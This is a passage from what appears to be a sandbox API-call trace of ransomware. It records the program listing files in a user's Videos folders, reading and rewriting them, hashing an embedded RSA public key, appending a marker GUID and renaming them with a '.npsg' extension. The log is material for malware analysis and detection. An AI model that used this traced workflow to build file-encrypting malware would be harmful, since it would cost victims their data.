(HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0240.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0240.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0240.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0240.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0240.811] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0240.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.811] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.811] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.811] CloseHandle (hObject=0x644) returned 1 [0240.813] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\oi-u2UZqt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\oi-u2uzqt.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\oi-u2UZqt.swf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\oi-u2uzqt.swf.npsg")) returned 1 [0240.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0240.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.814] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0240.816] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd32b8b20, ftCreationTime.dwHighDateTime=0x1d5b848, ftLastAccessTime.dwLowDateTime=0xdc014260, ftLastAccessTime.dwHighDateTime=0x1d5c560, ftLastWriteTime.dwLowDateTime=0xdc014260, ftLastWriteTime.dwHighDateTime=0x1d5c560, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tv5aGIifkvo_ ERh", cAlternateFileName="TV5AGI~1")) returned 1 [0240.816] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49c6fb50, ftCreationTime.dwHighDateTime=0x1d5bc15, ftLastAccessTime.dwLowDateTime=0xd0877490, ftLastAccessTime.dwHighDateTime=0x1d5c209, ftLastWriteTime.dwLowDateTime=0xd0877490, ftLastWriteTime.dwHighDateTime=0x1d5c209, nFileSizeHigh=0x0, nFileSizeLow=0x39bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ucvmjkZ1IRa7cwSHY7r.flv", cAlternateFileName="UCVMJK~1.FLV")) returned 1 [0240.816] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\ucvmjkZ1IRa7cwSHY7r.flv") returned=".flv" [0240.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\ucvmjkZ1IRa7cwSHY7r.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\ucvmjkz1ira7cwshy7r.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.817] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=14780) returned 1 [0240.817] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.819] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x3996, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.819] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.821] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x39bc, lpOverlapped=0x0) returned 1 [0240.822] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.822] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.822] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.822] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.824] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.824] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.824] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.824] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.824] GetLastError () returned 0x0 [0240.824] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.824] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.824] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.824] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.824] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.824] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.825] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x39bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.825] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.825] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.825] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.825] CloseHandle (hObject=0x644) returned 1 [0240.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0240.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b8bcd0 [0240.827] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\ucvmjkZ1IRa7cwSHY7r.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\ucvmjkz1ira7cwshy7r.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\ucvmjkZ1IRa7cwSHY7r.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\ucvmjkz1ira7cwshy7r.flv.npsg")) returned 1 [0240.829] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49c6fb50, ftCreationTime.dwHighDateTime=0x1d5bc15, ftLastAccessTime.dwLowDateTime=0xd0877490, ftLastAccessTime.dwHighDateTime=0x1d5c209, ftLastWriteTime.dwLowDateTime=0xd0877490, ftLastWriteTime.dwHighDateTime=0x1d5c209, nFileSizeHigh=0x0, nFileSizeLow=0x39bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ucvmjkZ1IRa7cwSHY7r.flv", cAlternateFileName="UCVMJK~1.FLV")) returned 0 [0240.829] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.829] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0240.829] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0240.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\") returned="dLXPSgTqJi3y2\\" [0240.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\") returned="NRaXHt\\" [0240.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0240.830] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0240.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0240.830] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0240.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f8e0 [0240.830] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0240.830] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.830] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.830] PathFindFileNameW (pszPath="") returned="" [0240.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0240.830] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424e8310, ftCreationTime.dwHighDateTime=0x1d5c607, ftLastAccessTime.dwLowDateTime=0xba31f3a0, ftLastAccessTime.dwHighDateTime=0x1d5c5a1, ftLastWriteTime.dwLowDateTime=0xba31f3a0, ftLastWriteTime.dwHighDateTime=0x1d5c5a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.833] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424e8310, ftCreationTime.dwHighDateTime=0x1d5c607, ftLastAccessTime.dwLowDateTime=0xba31f3a0, ftLastAccessTime.dwHighDateTime=0x1d5c5a1, ftLastWriteTime.dwLowDateTime=0xba31f3a0, ftLastWriteTime.dwHighDateTime=0x1d5c5a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.833] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e2e6d00, ftCreationTime.dwHighDateTime=0x1d5b622, ftLastAccessTime.dwLowDateTime=0x7a3ab2c0, ftLastAccessTime.dwHighDateTime=0x1d5c00e, ftLastWriteTime.dwLowDateTime=0x7a3ab2c0, ftLastWriteTime.dwHighDateTime=0x1d5c00e, nFileSizeHigh=0x0, nFileSizeLow=0x64cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BaZuioftz9c.swf", cAlternateFileName="BAZUIO~1.SWF")) returned 1 [0240.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0240.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x33b8188 [0240.833] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BaZuioftz9c.swf") returned=".swf" [0240.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BaZuioftz9c.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\bazuioftz9c.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.834] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=25807) returned 1 [0240.834] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.836] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x64a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.836] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.838] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x64cf, lpOverlapped=0x0) returned 1 [0240.839] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0240.839] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.839] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.839] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.840] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.840] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.840] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0240.840] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.840] GetLastError () returned 0x0 [0240.840] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.840] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.841] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.841] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.841] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64d0) returned 0x3b95d50 [0240.841] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0240.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f8e0 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ec8 [0240.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f928 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f70 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f28 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0240.842] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0240.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f70 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f28 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88f10 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree 